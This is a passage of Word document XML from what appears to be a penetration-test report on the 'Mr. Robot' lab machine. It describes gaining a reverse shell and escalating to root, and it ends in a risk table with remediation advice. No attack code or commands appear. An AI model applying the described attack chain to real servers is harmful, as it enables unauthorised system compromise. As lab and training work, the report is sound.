          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(daemon) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and confirms that system commands (such as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>directory listings) execute successfully, proving that the attacker has gained interactive access to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6526A6AF">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D0F4AB5">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Why it is important:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EA033B">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>This demonstrates that the exploited vulnerability allowed full remote command execution. Achieving a reverse shell is a critical point in the attack chain because it provides direct access to the operating system, enabling deeper enumeration, access to sensitive files, and eventual privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468975C0">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="300E4970">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Figure 3 – Initial Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/Reverse Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADBDB38">
      <w:pPr>
        <w:ind w:firstLine="100" w:firstLineChars="50"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="5080" b="190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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5265420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D008970">
      <w:pPr>
        <w:ind w:firstLine="100" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="508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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5265420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A2A7C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E7F1884">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 4 – Root Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/ Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD5A94D">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: Successful Privilege Escalation to Root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68054D83">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Shows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">command output confirming root privileges. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECE08A2">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explanation (What it proves):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A8D333">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BCC26EE">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>This screenshot shows the attacker gaining a root shell on the Mr. Robot target machine. The terminal prompt confirms the user context has changed to root, and privileged commands such as viewing  directory contents execute without restriction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CAA549">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44602D43">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Why it is important:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ECA29F">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F60F1C3">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>This demonstrates full system compromise. Obtaining a root shell means the attacker has complete control over the machine, including access to all files, system configurations, and the ability to modify or disable security controls. It represents the highest level of impact in the attack chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4773A224">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CE86DA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C22D7F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3116B13F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A711F3B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Figure 4 – Root Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/Privilege  Escalation image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FFAB94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="5080" b="190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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5265420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE2C3E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B159C16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B5F0E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C21907D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Risk Summary Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463D7A71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs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2896"/>
        <w:gridCol w:w="997"/>
        <w:gridCol w:w="2411"/>
        <w:gridCol w:w="1704"/>
      </w:tblGrid>
      <w:tr w14:paraId="1064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757E28C3">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bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2896" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6572DE92">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bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="997" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40D6866A">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bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Risk Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2882131D">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bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Impact Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C435A7A">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bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Recommended Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="367B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77ECB3CF">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1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2896" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D556223">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Open Web Services (Ports 22, 80, and 443)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="997" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EBDD13B">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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07142CF7">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Publicly accessible web services allow attackers to enumerate the WordPress site and identify potential vulnerabilities.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22DDDFAA">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5960F493">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rPr>
              <w:t>Restrict unnecessary services, enforce firewall rules, and ensure web server components are fully patched.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Harden the web application.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1E53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6FA27B3E">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2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2896" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2791781E">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Directory Enumeration Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="997" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D27E793">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="450D4176">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>Hidden directories (e.g.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> /robot.txt, wp-admin, wp-content</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>) reveal sensitive files and information that support further attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4643CE23">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>Limit directory listing, secure sensitive files, and implement proper access controls.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5990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7CA87C4F">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3.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2896" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33333370">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Sensitive File Exposure (robot.txt,)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="338C0BEF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="997" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79857848">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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23CEFF39">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Files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
